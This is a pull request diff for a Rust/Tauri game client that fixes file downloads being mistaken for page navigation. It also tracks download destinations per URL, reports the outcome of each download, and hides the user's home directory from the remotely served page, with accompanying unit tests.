### PR TITLE
fix(client): stop the external-link handler cancelling file downloads

### DIFF
--- a/client/src-tauri/src/lib.rs
+++ b/client/src-tauri/src/lib.rs
@@ -46,6 +46,47 @@ fn finished_download_report(
     }
 }
 
+/// The downloads wry has requested for one URL and not yet finished. A second
+/// request for the same URL while the first is in flight leaves both
+/// destinations unattributable — wry uniquifies a destination before this
+/// handler sees it, so they name different files, and nothing in a `Finished`
+/// event says which request it belongs to. Only the count survives that, and
+/// no completion gets a fallback destination until the URL is idle again.
+#[cfg(desktop)]
+#[derive(Default)]
+struct OutstandingDownloads {
+    requests: usize,
+    destination: Option<PathBuf>,
+}
+
+#[cfg(desktop)]
+fn stash_download_destination(
+    outstanding: &mut HashMap<String, OutstandingDownloads>,
+    url: String,
+    destination: PathBuf,
+) {
+    let entry = outstanding.entry(url).or_default();
+    entry.requests += 1;
+    entry.destination = (entry.requests == 1).then_some(destination);
+}
+
+/// Consume one outstanding request for `url`, yielding its destination only
+/// when that request was the only one in flight. The last completion drops the
+/// URL, so the map holds live downloads and nothing else.
+#[cfg(desktop)]
+fn take_download_destination(
+    outstanding: &mut HashMap<String, OutstandingDownloads>,
+    url: &str,
+) -> Option<PathBuf> {
+    let entry = outstanding.get_mut(url)?;
+    entry.requests -= 1;
+    let destination = entry.destination.take();
+    if entry.requests == 0 {
+        outstanding.remove(url);
+    }
+    destination
+}
+
 /// Compress a leading home directory to `~`, or report nothing. The page is
 /// remotely served, so an absolute path hands that origin the user's account
 /// name and filesystem layout; home-relative still finds the file. A path
@@ -188,7 +229,8 @@ pub fn run() {
                 // Kick off the audio-device probe before the webview exists so the
                 // verdict is usually cached by the time the page asks for it.
                 audio_probe::prewarm();
-                let download_destinations: Mutex<HashMap<String, PathBuf>> = Mutex::default();
+                let download_destinations: Mutex<HashMap<String, OutstandingDownloads>> =
+                    Mutex::default();
                 // `create: false` on the "main" window in tauri.conf.json defers
                 // window creation to here so we can pin an explicit, always-writable
                 // `data_directory` on Windows. WebView2 otherwise derives its
@@ -237,14 +279,19 @@ pub fn run() {
                                     destination.display()
                                 );
                                 if let Ok(mut destinations) = download_destinations.lock() {
-                                    destinations.insert(url.to_string(), destination.clone());
+                                    stash_download_destination(
+                                        &mut destinations,
+                                        url.to_string(),
+                                        destination.clone(),
+                                    );
                                 }
                             }
                             DownloadEvent::Finished { url, path, success } => {
-                                let stashed = download_destinations
-                                    .lock()
-                                    .ok()
-                                    .and_then(|mut destinations| destinations.remove(url.as_str()));
+                                let stashed = download_destinations.lock().ok().and_then(
+                                    |mut destinations| {
+                                        take_download_destination(&mut destinations, url.as_str())
+                                    },
+                                );
                                 let (path, outcome) =
                                     finished_download_report(path, success, stashed);
                                 eprintln!(
@@ -498,6 +545,81 @@ mod tests {
         );
 
         fs::remove_file(&written).unwrap();
+    }
+
+    /// Two downloads of one URL get different destinations from wry and arrive
+    /// here as two indistinguishable completions. Lending either completion the
+    /// other's destination would report a file the page never asked about, so
+    /// an ambiguous completion carries no destination at all.
+    #[cfg(desktop)]
+    #[test]
+    fn a_repeated_download_url_lends_no_completion_another_requests_destination() {
+        use std::{collections::HashMap, path::PathBuf};
+
+        let url = "blob:https://phase-rs.dev/a";
+        let other = "blob:https://phase-rs.dev/b";
+        let first = PathBuf::from("/downloads/game-state.zip");
+        let second = PathBuf::from("/downloads/game-state (1).zip");
+        let mut outstanding = HashMap::new();
+
+        // One in flight: the destination is this completion's, unambiguously.
+        super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, url),
+            Some(first.clone())
+        );
+        assert!(outstanding.is_empty(), "a finished url must not be kept");
+
+        // Two in flight for one url: neither completion may claim a destination.
+        super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
+        super::stash_download_destination(&mut outstanding, url.to_owned(), second.clone());
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, url),
+            None
+        );
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, url),
+            None
+        );
+        assert!(
+            outstanding.is_empty(),
+            "the last completion must drop the url"
+        );
+
+        // A third request arriving while those two are unresolved is ambiguous
+        // with them, and the url only becomes attributable again once idle.
+        super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
+        super::stash_download_destination(&mut outstanding, url.to_owned(), second.clone());
+        super::take_download_destination(&mut outstanding, url);
+        super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, url),
+            None
+        );
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, url),
+            None
+        );
+        assert!(outstanding.is_empty());
+
+        // Distinct urls never borrow from each other.
+        super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
+        super::stash_download_destination(&mut outstanding, other.to_owned(), second.clone());
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, other),
+            Some(second)
+        );
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, url),
+            Some(first)
+        );
+        assert!(outstanding.is_empty());
+
+        // A completion with nothing outstanding has nothing to lend.
+        assert_eq!(
+            super::take_download_destination(&mut outstanding, url),
+            None
+        );
     }
 
     /// The page is remotely served, so the destination it is handed must name

--- a/client/src-tauri/src/lib.rs
+++ b/client/src-tauri/src/lib.rs
@@ -1,5 +1,42 @@
 #[cfg(desktop)]
-use tauri::{Manager, WebviewWindowBuilder};
+use std::{collections::HashMap, path::PathBuf, sync::Mutex};
+
+#[cfg(desktop)]
+use tauri::{webview::DownloadEvent, Emitter, Manager, WebviewWindowBuilder};
+
+#[cfg(desktop)]
+use crate::native_engine_contract::ShellDownload;
+
+/// Carries a finished download's absolute path to the page.
+#[cfg(desktop)]
+const DOWNLOAD_EVENT: &str = "shell-download";
+
+/// What a finished download should report: where it landed, and whether it
+/// worked. wry's failure flag lives on the `WebContext` — one per process — and
+/// is only ever set, never cleared, so every download after a single failure
+/// arrives here with `success = false` and no path even though the file was
+/// written. The destination wry named when it requested the download lets the
+/// filesystem settle that instead of the flag.
+///
+/// The trade: a download that fails mid-write (ENOSPC, EIO) leaves a truncated
+/// file that `exists()`, so this reports success where trusting the flag would
+/// not. It is accepted because the flag is wrong for every download after the
+/// first failure, and because wry uniquifies the destination before requesting
+/// it, so a file found there is always this download's.
+#[cfg(desktop)]
+fn finished_download_report(
+    wry_path: Option<PathBuf>,
+    wry_success: bool,
+    stashed_destination: Option<PathBuf>,
+) -> (Option<PathBuf>, bool) {
+    if wry_success && wry_path.is_some() {
+        return (wry_path, true);
+    }
+    match stashed_destination.filter(|destination| destination.exists()) {
+        Some(destination) => (Some(destination), true),
+        None => (wry_path, wry_success),
+    }
+}
 
 mod audio_probe;
 mod host_platform;
@@ -119,6 +156,7 @@ pub fn run() {
                 // Kick off the audio-device probe before the webview exists so the
                 // verdict is usually cached by the time the page asks for it.
                 audio_probe::prewarm();
+                let download_destinations: Mutex<HashMap<String, PathBuf>> = Mutex::default();
                 // `create: false` on the "main" window in tauri.conf.json defers
                 // window creation to here so we can pin an explicit, always-writable
                 // `data_directory` on Windows. WebView2 otherwise derives its
@@ -136,10 +174,55 @@ pub fn run() {
                 // and force a one-time re-login, so we leave those platforms on their
                 // defaults and just build the window straight from config.
                 let main_config = &app.config().app.windows[0];
-                let builder =
-                    WebviewWindowBuilder::from_config(app, main_config)?.on_navigation(|_| {
-                        native_engine::abort_native_engine_bridges_on_navigation();
-                        native_bridge::abort_lan_bridges();
+                let builder = WebviewWindowBuilder::from_config(app, main_config)?
+                    .on_navigation(|url| {
+                        // An `<a download>` click arrives here as a navigation to its
+                        // `blob:` URL; the page is not going anywhere, so the live
+                        // game's bridges must survive it.
+                        if url.scheme() != "blob" {
+                            native_engine::abort_native_engine_bridges_on_navigation();
+                            native_bridge::abort_lan_bridges();
+                        }
+                        true
+                    })
+                    // wry already accepts downloads on its own; what it does not do is
+                    // tell anyone where the file went. The page only knows the name it
+                    // asked for, so report the real destination to the log and to the
+                    // page from here, where it is known.
+                    .on_download(move |webview, event| {
+                        match event {
+                            DownloadEvent::Requested { url, destination } => {
+                                eprintln!(
+                                    "shell download requested: {url} -> {}",
+                                    destination.display()
+                                );
+                                if let Ok(mut destinations) = download_destinations.lock() {
+                                    destinations.insert(url.to_string(), destination.clone());
+                                }
+                            }
+                            DownloadEvent::Finished { url, path, success } => {
+                                let stashed = download_destinations
+                                    .lock()
+                                    .ok()
+                                    .and_then(|mut destinations| destinations.remove(url.as_str()));
+                                let (path, success) =
+                                    finished_download_report(path, success, stashed);
+                                eprintln!(
+                                    "shell download finished: {url} -> {path:?} success={success}"
+                                );
+                                let _ = webview.emit(
+                                    DOWNLOAD_EVENT,
+                                    ShellDownload {
+                                        url: url.to_string(),
+                                        path: path.as_ref().map(|p| p.display().to_string()),
+                                        success,
+                                    },
+                                );
+                            }
+                            // `DownloadEvent` is `#[non_exhaustive]`; a variant added
+                            // upstream needs no decision here.
+                            _ => {}
+                        }
                         true
                     });
                 #[cfg(target_os = "windows")]
@@ -326,6 +409,57 @@ mod tests {
                 "updater registration lost required invariant: {required}"
             );
         }
+    }
+
+    /// The one arm with no other witness: wry latches its per-`WebContext`
+    /// failure flag on the first failed download, so from then on a written
+    /// file arrives as `(None, false)` and only the destination on disk can
+    /// tell that apart from a real failure.
+    #[cfg(desktop)]
+    #[test]
+    fn finished_download_report_trusts_the_filesystem_over_a_latched_failure_flag() {
+        let written = std::env::temp_dir().join(format!(
+            "phase-rs-finished-download-{}.tmp",
+            std::process::id()
+        ));
+        fs::write(&written, b"x").unwrap();
+        let missing = written.with_extension("absent");
+
+        assert_eq!(
+            super::finished_download_report(Some(written.clone()), true, None),
+            (Some(written.clone()), true)
+        );
+        // Latched flag, file present.
+        assert_eq!(
+            super::finished_download_report(None, false, Some(written.clone())),
+            (Some(written.clone()), true)
+        );
+        // Genuine failure: nothing was written to the destination.
+        assert_eq!(
+            super::finished_download_report(None, false, Some(missing)),
+            (None, false)
+        );
+        // A `Finished` with no matching `Requested` has nothing to check.
+        assert_eq!(
+            super::finished_download_report(None, false, None),
+            (None, false)
+        );
+
+        fs::remove_file(&written).unwrap();
+    }
+
+    /// Nothing automated catches this grant going missing: no CI job builds the
+    /// Flatpak, and ci.yml's tauri-check job — the only runner of this crate's
+    /// tests — is disabled. This fires only under a local cargo test.
+    #[test]
+    fn flatpak_manifest_grants_the_download_directory() {
+        let manifest = include_str!("../../../packaging/flatpak/rs.phase.app.yml");
+        assert!(
+            manifest
+                .lines()
+                .any(|line| line.trim() == "- --filesystem=xdg-download:create"),
+            "packaging/flatpak/rs.phase.app.yml must grant --filesystem=xdg-download:create"
+        );
     }
 
     /// Flatpak keys the desktop entry, the icons and the AppStream component on

--- a/client/src-tauri/src/lib.rs
+++ b/client/src-tauri/src/lib.rs
@@ -46,15 +46,18 @@ fn finished_download_report(
     }
 }
 
-/// Compress a leading home directory to `~`. The page is remotely served, so an
-/// absolute path hands that origin the user's account name and filesystem
-/// layout; home-relative still finds the file.
+/// Compress a leading home directory to `~`, or report nothing. The page is
+/// remotely served, so an absolute path hands that origin the user's account
+/// name and filesystem layout; home-relative still finds the file. A path
+/// outside home — `XDG_DOWNLOAD_DIR` elsewhere, wry's working-directory
+/// fallback — and an undeterminable home have nothing to compress, so the page
+/// is told no path at all, exactly as a browser download leaves it.
 #[cfg(desktop)]
-fn home_relative_path(path: &Path, home: Option<&Path>) -> String {
+fn reportable_download_path(path: &Path, home: Option<&Path>) -> Option<String> {
     match home.and_then(|home| path.strip_prefix(home).ok()) {
-        Some(relative) if relative.as_os_str().is_empty() => "~".to_owned(),
-        Some(relative) => format!("~{MAIN_SEPARATOR}{}", relative.display()),
-        None => path.display().to_string(),
+        Some(relative) if relative.as_os_str().is_empty() => Some("~".to_owned()),
+        Some(relative) => Some(format!("~{MAIN_SEPARATOR}{}", relative.display())),
+        None => None,
     }
 }
 
@@ -224,7 +227,8 @@ pub fn run() {
                     // wry already accepts downloads on its own; what it does not do is
                     // tell anyone where the file went. The page only knows the name it
                     // asked for, so report the destination from here, where it is
-                    // known: in full to the log, home-relative to the page.
+                    // known: in full to the log, home-relative or not at all to the
+                    // page.
                     .on_download(move |webview, event| {
                         match event {
                             DownloadEvent::Requested { url, destination } => {
@@ -250,8 +254,8 @@ pub fn run() {
                                     DOWNLOAD_EVENT,
                                     ShellDownload {
                                         url: url.to_string(),
-                                        path: path.as_deref().map(|path| {
-                                            home_relative_path(
+                                        path: path.as_deref().and_then(|path| {
+                                            reportable_download_path(
                                                 path,
                                                 std::env::home_dir().as_deref(),
                                             )
@@ -496,31 +500,34 @@ mod tests {
         fs::remove_file(&written).unwrap();
     }
 
-    /// The page is remotely served, so the destination it is handed must not
-    /// spell out the user's home directory.
+    /// The page is remotely served, so the destination it is handed must name
+    /// no part of the user's filesystem. Only a home-relative path qualifies;
+    /// anything else is withheld rather than handed over absolute.
     #[cfg(desktop)]
     #[test]
-    fn emitted_download_path_hides_the_home_directory() {
+    fn emitted_download_path_never_names_the_users_filesystem() {
         let home = Path::new("/home/alice");
         let inside = home.join("Downloads").join("game-state.zip");
         assert_eq!(
-            super::home_relative_path(&inside, Some(home)),
-            format!(
+            super::reportable_download_path(&inside, Some(home)),
+            Some(format!(
                 "~{sep}Downloads{sep}game-state.zip",
                 sep = std::path::MAIN_SEPARATOR
-            )
-        );
-        assert_eq!(super::home_relative_path(home, Some(home)), "~");
-        // A neighbour whose name merely starts with the home path stays whole.
-        let outside = Path::new("/home/alice-backup/game-state.zip");
-        assert_eq!(
-            super::home_relative_path(outside, Some(home)),
-            outside.display().to_string()
+            ))
         );
         assert_eq!(
-            super::home_relative_path(&inside, None),
-            inside.display().to_string()
+            super::reportable_download_path(home, Some(home)).as_deref(),
+            Some("~")
         );
+        // A neighbour whose name merely starts with the home path is outside it,
+        // as is any download directory pointed elsewhere.
+        for outside in [
+            Path::new("/home/alice-backup/game-state.zip"),
+            Path::new("/media/alice-usb/game-state.zip"),
+        ] {
+            assert_eq!(super::reportable_download_path(outside, Some(home)), None);
+        }
+        assert_eq!(super::reportable_download_path(&inside, None), None);
     }
 
     /// The navigation guard cannot see an `<a download>`, so it spares every

--- a/client/src-tauri/src/lib.rs
+++ b/client/src-tauri/src/lib.rs
@@ -1,13 +1,20 @@
 #[cfg(desktop)]
-use std::{collections::HashMap, path::PathBuf, sync::Mutex};
+use std::{
+    collections::HashMap,
+    path::{Path, PathBuf, MAIN_SEPARATOR},
+    sync::Mutex,
+};
 
 #[cfg(desktop)]
-use tauri::{webview::DownloadEvent, Emitter, Manager, WebviewWindowBuilder};
+use tauri::{
+    webview::{DownloadEvent, PageLoadEvent},
+    Emitter, Manager, Url, WebviewWindowBuilder,
+};
 
 #[cfg(desktop)]
-use crate::native_engine_contract::ShellDownload;
+use crate::native_engine_contract::{ShellDownload, ShellDownloadOutcome};
 
-/// Carries a finished download's absolute path to the page.
+/// Carries a finished download's outcome and destination to the page.
 #[cfg(desktop)]
 const DOWNLOAD_EVENT: &str = "shell-download";
 
@@ -15,27 +22,49 @@ const DOWNLOAD_EVENT: &str = "shell-download";
 /// worked. wry's failure flag lives on the `WebContext` — one per process — and
 /// is only ever set, never cleared, so every download after a single failure
 /// arrives here with `success = false` and no path even though the file was
-/// written. The destination wry named when it requested the download lets the
-/// filesystem settle that instead of the flag.
-///
-/// The trade: a download that fails mid-write (ENOSPC, EIO) leaves a truncated
-/// file that `exists()`, so this reports success where trusting the flag would
-/// not. It is accepted because the flag is wrong for every download after the
-/// first failure, and because wry uniquifies the destination before requesting
-/// it, so a file found there is always this download's.
+/// written. The destination wry named when it requested the download narrows
+/// that, but it cannot settle it: a write that dies mid-file (ENOSPC, EIO)
+/// leaves a truncated file at that same destination. Nothing here can tell the
+/// two apart, so they report `Unknown` rather than claim a corrupt file.
 #[cfg(desktop)]
 fn finished_download_report(
     wry_path: Option<PathBuf>,
     wry_success: bool,
     stashed_destination: Option<PathBuf>,
-) -> (Option<PathBuf>, bool) {
-    if wry_success && wry_path.is_some() {
-        return (wry_path, true);
+) -> (Option<PathBuf>, ShellDownloadOutcome) {
+    if wry_success {
+        // wry's macOS handler reports no path, so the destination it named when
+        // it asked for the download is the only one there is.
+        return (
+            wry_path.or(stashed_destination),
+            ShellDownloadOutcome::Saved,
+        );
     }
     match stashed_destination.filter(|destination| destination.exists()) {
-        Some(destination) => (Some(destination), true),
-        None => (wry_path, wry_success),
+        Some(destination) => (Some(destination), ShellDownloadOutcome::Unknown),
+        None => (wry_path, ShellDownloadOutcome::Failed),
     }
+}
+
+/// Compress a leading home directory to `~`. The page is remotely served, so an
+/// absolute path hands that origin the user's account name and filesystem
+/// layout; home-relative still finds the file.
+#[cfg(desktop)]
+fn home_relative_path(path: &Path, home: Option<&Path>) -> String {
+    match home.and_then(|home| path.strip_prefix(home).ok()) {
+        Some(relative) if relative.as_os_str().is_empty() => "~".to_owned(),
+        Some(relative) => format!("~{MAIN_SEPARATOR}{}", relative.display()),
+        None => path.display().to_string(),
+    }
+}
+
+/// Whether a page load means the webview really left the page. The navigation
+/// guard has to spare `blob:`, since a file download arrives as a navigation to
+/// one; a committed load — wry's `Started` on every backend — is the proof a
+/// download never produces.
+#[cfg(desktop)]
+fn page_load_leaves_the_page(url: &Url, event: PageLoadEvent) -> bool {
+    url.scheme() == "blob" && event == PageLoadEvent::Started
 }
 
 mod audio_probe;
@@ -177,18 +206,25 @@ pub fn run() {
                 let builder = WebviewWindowBuilder::from_config(app, main_config)?
                     .on_navigation(|url| {
                         // An `<a download>` click arrives here as a navigation to its
-                        // `blob:` URL; the page is not going anywhere, so the live
-                        // game's bridges must survive it.
+                        // `blob:` URL, and nothing at this point distinguishes it from
+                        // a real `blob:` page, so the live game's bridges have to
+                        // survive it and `on_page_load` settles the other case.
                         if url.scheme() != "blob" {
                             native_engine::abort_native_engine_bridges_on_navigation();
                             native_bridge::abort_lan_bridges();
                         }
                         true
                     })
+                    .on_page_load(|_window, payload| {
+                        if page_load_leaves_the_page(payload.url(), payload.event()) {
+                            native_engine::abort_native_engine_bridges_on_navigation();
+                            native_bridge::abort_lan_bridges();
+                        }
+                    })
                     // wry already accepts downloads on its own; what it does not do is
                     // tell anyone where the file went. The page only knows the name it
-                    // asked for, so report the real destination to the log and to the
-                    // page from here, where it is known.
+                    // asked for, so report the destination from here, where it is
+                    // known: in full to the log, home-relative to the page.
                     .on_download(move |webview, event| {
                         match event {
                             DownloadEvent::Requested { url, destination } => {
@@ -205,17 +241,22 @@ pub fn run() {
                                     .lock()
                                     .ok()
                                     .and_then(|mut destinations| destinations.remove(url.as_str()));
-                                let (path, success) =
+                                let (path, outcome) =
                                     finished_download_report(path, success, stashed);
                                 eprintln!(
-                                    "shell download finished: {url} -> {path:?} success={success}"
+                                    "shell download finished: {url} -> {path:?} outcome={outcome:?}"
                                 );
                                 let _ = webview.emit(
                                     DOWNLOAD_EVENT,
                                     ShellDownload {
                                         url: url.to_string(),
-                                        path: path.as_ref().map(|p| p.display().to_string()),
-                                        success,
+                                        path: path.as_deref().map(|path| {
+                                            home_relative_path(
+                                                path,
+                                                std::env::home_dir().as_deref(),
+                                            )
+                                        }),
+                                        outcome,
                                     },
                                 );
                             }
@@ -411,13 +452,15 @@ mod tests {
         }
     }
 
-    /// The one arm with no other witness: wry latches its per-`WebContext`
-    /// failure flag on the first failed download, so from then on a written
-    /// file arrives as `(None, false)` and only the destination on disk can
-    /// tell that apart from a real failure.
+    /// wry latches its per-`WebContext` failure flag on the first failed
+    /// download, so from then on a written file arrives as `(None, false)` —
+    /// and a write that died mid-file leaves a truncated file at that same
+    /// destination. Neither may be reported as saved.
     #[cfg(desktop)]
     #[test]
-    fn finished_download_report_trusts_the_filesystem_over_a_latched_failure_flag() {
+    fn finished_download_report_never_calls_a_reported_failure_saved() {
+        use super::ShellDownloadOutcome::{Failed, Saved, Unknown};
+
         let written = std::env::temp_dir().join(format!(
             "phase-rs-finished-download-{}.tmp",
             std::process::id()
@@ -427,25 +470,76 @@ mod tests {
 
         assert_eq!(
             super::finished_download_report(Some(written.clone()), true, None),
-            (Some(written.clone()), true)
+            (Some(written.clone()), Saved)
         );
-        // Latched flag, file present.
+        // wry's macOS handler reports success with no path at all.
+        assert_eq!(
+            super::finished_download_report(None, true, Some(written.clone())),
+            (Some(written.clone()), Saved)
+        );
+        // Latched flag or truncated file: indistinguishable from here.
         assert_eq!(
             super::finished_download_report(None, false, Some(written.clone())),
-            (Some(written.clone()), true)
+            (Some(written.clone()), Unknown)
         );
         // Genuine failure: nothing was written to the destination.
         assert_eq!(
             super::finished_download_report(None, false, Some(missing)),
-            (None, false)
+            (None, Failed)
         );
         // A `Finished` with no matching `Requested` has nothing to check.
         assert_eq!(
             super::finished_download_report(None, false, None),
-            (None, false)
+            (None, Failed)
         );
 
         fs::remove_file(&written).unwrap();
+    }
+
+    /// The page is remotely served, so the destination it is handed must not
+    /// spell out the user's home directory.
+    #[cfg(desktop)]
+    #[test]
+    fn emitted_download_path_hides_the_home_directory() {
+        let home = Path::new("/home/alice");
+        let inside = home.join("Downloads").join("game-state.zip");
+        assert_eq!(
+            super::home_relative_path(&inside, Some(home)),
+            format!(
+                "~{sep}Downloads{sep}game-state.zip",
+                sep = std::path::MAIN_SEPARATOR
+            )
+        );
+        assert_eq!(super::home_relative_path(home, Some(home)), "~");
+        // A neighbour whose name merely starts with the home path stays whole.
+        let outside = Path::new("/home/alice-backup/game-state.zip");
+        assert_eq!(
+            super::home_relative_path(outside, Some(home)),
+            outside.display().to_string()
+        );
+        assert_eq!(
+            super::home_relative_path(&inside, None),
+            inside.display().to_string()
+        );
+    }
+
+    /// The navigation guard cannot see an `<a download>`, so it spares every
+    /// `blob:` navigation. A committed page load is the one signal that says
+    /// the webview left the page instead of saving a file.
+    #[cfg(desktop)]
+    #[test]
+    fn only_a_committed_blob_page_load_ends_the_session() {
+        use super::PageLoadEvent::{Finished, Started};
+        use tauri::Url;
+
+        let blob = Url::parse("blob:https://phase-rs.dev/0f8a4c21").unwrap();
+        let page = Url::parse("https://phase-rs.dev/play").unwrap();
+
+        assert!(super::page_load_leaves_the_page(&blob, Started));
+        // The navigation guard tore these down before the load began.
+        assert!(!super::page_load_leaves_the_page(&page, Started));
+        // `Started` is the commit, so `Finished` would only repeat it.
+        assert!(!super::page_load_leaves_the_page(&blob, Finished));
     }
 
     /// Nothing automated catches this grant going missing: no CI job builds the

--- a/client/src-tauri/src/lib.rs
+++ b/client/src-tauri/src/lib.rs
@@ -25,25 +25,43 @@ const DOWNLOAD_EVENT: &str = "shell-download";
 /// written. The destination wry named when it requested the download narrows
 /// that, but it cannot settle it: a write that dies mid-file (ENOSPC, EIO)
 /// leaves a truncated file at that same destination. Nothing here can tell the
-/// two apart, so they report `Unknown` rather than claim a corrupt file.
+/// two apart, so they report `Unknown` rather than claim a corrupt file. A
+/// withheld attribution lands in the same place: it is a gap in this handler's
+/// bookkeeping, not evidence about the file.
 #[cfg(desktop)]
 fn finished_download_report(
     wry_path: Option<PathBuf>,
     wry_success: bool,
-    stashed_destination: Option<PathBuf>,
+    attribution: DownloadAttribution,
 ) -> (Option<PathBuf>, ShellDownloadOutcome) {
-    if wry_success {
+    use DownloadAttribution::{Ambiguous, Attributed, Unmatched};
+    use ShellDownloadOutcome::{Failed, Saved, Unknown};
+
+    match (wry_success, attribution) {
         // wry's macOS handler reports no path, so the destination it named when
         // it asked for the download is the only one there is.
-        return (
-            wry_path.or(stashed_destination),
-            ShellDownloadOutcome::Saved,
-        );
+        (true, Attributed(destination)) => (wry_path.or(Some(destination)), Saved),
+        (true, Ambiguous | Unmatched) => (wry_path, Saved),
+        (false, Attributed(destination)) if destination.exists() => (Some(destination), Unknown),
+        // Nothing reached the destination the request named.
+        (false, Attributed(_)) => (wry_path, Failed),
+        // No destination was attributable, so there is nothing to check and no
+        // grounds to call the download failed.
+        (false, Ambiguous) => (wry_path, Unknown),
+        (false, Unmatched) => (wry_path, Failed),
     }
-    match stashed_destination.filter(|destination| destination.exists()) {
-        Some(destination) => (Some(destination), ShellDownloadOutcome::Unknown),
-        None => (wry_path, ShellDownloadOutcome::Failed),
-    }
+}
+
+/// Which request a `Finished` event belongs to, as far as this handler can
+/// tell. `Ambiguous` is a completion whose destination was withheld because
+/// more than one request for its url was in flight; `Unmatched` is a completion
+/// for a url with nothing outstanding at all.
+#[cfg(desktop)]
+#[derive(Debug, PartialEq, Eq)]
+enum DownloadAttribution {
+    Attributed(PathBuf),
+    Ambiguous,
+    Unmatched,
 }
 
 /// The downloads wry has requested for one URL and not yet finished. A second
@@ -70,21 +88,26 @@ fn stash_download_destination(
     entry.destination = (entry.requests == 1).then_some(destination);
 }
 
-/// Consume one outstanding request for `url`, yielding its destination only
+/// Consume one outstanding request for `url`, attributing its destination only
 /// when that request was the only one in flight. The last completion drops the
 /// URL, so the map holds live downloads and nothing else.
 #[cfg(desktop)]
-fn take_download_destination(
+fn take_download_attribution(
     outstanding: &mut HashMap<String, OutstandingDownloads>,
     url: &str,
-) -> Option<PathBuf> {
-    let entry = outstanding.get_mut(url)?;
+) -> DownloadAttribution {
+    let Some(entry) = outstanding.get_mut(url) else {
+        return DownloadAttribution::Unmatched;
+    };
     entry.requests -= 1;
     let destination = entry.destination.take();
     if entry.requests == 0 {
         outstanding.remove(url);
     }
-    destination
+    destination.map_or(
+        DownloadAttribution::Ambiguous,
+        DownloadAttribution::Attributed,
+    )
 }
 
 /// Compress a leading home directory to `~`, or report nothing. The page is
@@ -287,13 +310,17 @@ pub fn run() {
                                 }
                             }
                             DownloadEvent::Finished { url, path, success } => {
-                                let stashed = download_destinations.lock().ok().and_then(
+                                // A record that cannot be read attributes
+                                // nothing, which is this handler's limitation
+                                // rather than evidence about the file.
+                                let attribution = download_destinations.lock().map_or(
+                                    DownloadAttribution::Ambiguous,
                                     |mut destinations| {
-                                        take_download_destination(&mut destinations, url.as_str())
+                                        take_download_attribution(&mut destinations, url.as_str())
                                     },
                                 );
                                 let (path, outcome) =
-                                    finished_download_report(path, success, stashed);
+                                    finished_download_report(path, success, attribution);
                                 eprintln!(
                                     "shell download finished: {url} -> {path:?} outcome={outcome:?}"
                                 );
@@ -510,6 +537,7 @@ mod tests {
     #[cfg(desktop)]
     #[test]
     fn finished_download_report_never_calls_a_reported_failure_saved() {
+        use super::DownloadAttribution::{Ambiguous, Attributed, Unmatched};
         use super::ShellDownloadOutcome::{Failed, Saved, Unknown};
 
         let written = std::env::temp_dir().join(format!(
@@ -520,28 +548,34 @@ mod tests {
         let missing = written.with_extension("absent");
 
         assert_eq!(
-            super::finished_download_report(Some(written.clone()), true, None),
+            super::finished_download_report(Some(written.clone()), true, Unmatched),
             (Some(written.clone()), Saved)
         );
         // wry's macOS handler reports success with no path at all.
         assert_eq!(
-            super::finished_download_report(None, true, Some(written.clone())),
+            super::finished_download_report(None, true, Attributed(written.clone())),
             (Some(written.clone()), Saved)
         );
         // Latched flag or truncated file: indistinguishable from here.
         assert_eq!(
-            super::finished_download_report(None, false, Some(written.clone())),
+            super::finished_download_report(None, false, Attributed(written.clone())),
             (Some(written.clone()), Unknown)
         );
         // Genuine failure: nothing was written to the destination.
         assert_eq!(
-            super::finished_download_report(None, false, Some(missing)),
+            super::finished_download_report(None, false, Attributed(missing)),
             (None, Failed)
         );
-        // A `Finished` with no matching `Requested` has nothing to check.
+        // A `Finished` with no matching `Requested` at all.
         assert_eq!(
-            super::finished_download_report(None, false, None),
+            super::finished_download_report(None, false, Unmatched),
             (None, Failed)
+        );
+        // Attribution withheld between same-url requests: the latched flag may
+        // still be reporting a written file.
+        assert_eq!(
+            super::finished_download_report(None, false, Ambiguous),
+            (None, Unknown)
         );
 
         fs::remove_file(&written).unwrap();
@@ -556,6 +590,8 @@ mod tests {
     fn a_repeated_download_url_lends_no_completion_another_requests_destination() {
         use std::{collections::HashMap, path::PathBuf};
 
+        use super::DownloadAttribution::{Ambiguous, Attributed, Unmatched};
+
         let url = "blob:https://phase-rs.dev/a";
         let other = "blob:https://phase-rs.dev/b";
         let first = PathBuf::from("/downloads/game-state.zip");
@@ -565,8 +601,8 @@ mod tests {
         // One in flight: the destination is this completion's, unambiguously.
         super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
         assert_eq!(
-            super::take_download_destination(&mut outstanding, url),
-            Some(first.clone())
+            super::take_download_attribution(&mut outstanding, url),
+            Attributed(first.clone())
         );
         assert!(outstanding.is_empty(), "a finished url must not be kept");
 
@@ -574,12 +610,12 @@ mod tests {
         super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
         super::stash_download_destination(&mut outstanding, url.to_owned(), second.clone());
         assert_eq!(
-            super::take_download_destination(&mut outstanding, url),
-            None
+            super::take_download_attribution(&mut outstanding, url),
+            Ambiguous
         );
         assert_eq!(
-            super::take_download_destination(&mut outstanding, url),
-            None
+            super::take_download_attribution(&mut outstanding, url),
+            Ambiguous
         );
         assert!(
             outstanding.is_empty(),
@@ -590,15 +626,15 @@ mod tests {
         // with them, and the url only becomes attributable again once idle.
         super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
         super::stash_download_destination(&mut outstanding, url.to_owned(), second.clone());
-        super::take_download_destination(&mut outstanding, url);
+        super::take_download_attribution(&mut outstanding, url);
         super::stash_download_destination(&mut outstanding, url.to_owned(), first.clone());
         assert_eq!(
-            super::take_download_destination(&mut outstanding, url),
-            None
+            super::take_download_attribution(&mut outstanding, url),
+            Ambiguous
         );
         assert_eq!(
-            super::take_download_destination(&mut outstanding, url),
-            None
+            super::take_download_attribution(&mut outstanding, url),
+            Ambiguous
         );
         assert!(outstanding.is_empty());
 
@@ -606,20 +642,86 @@ mod tests {
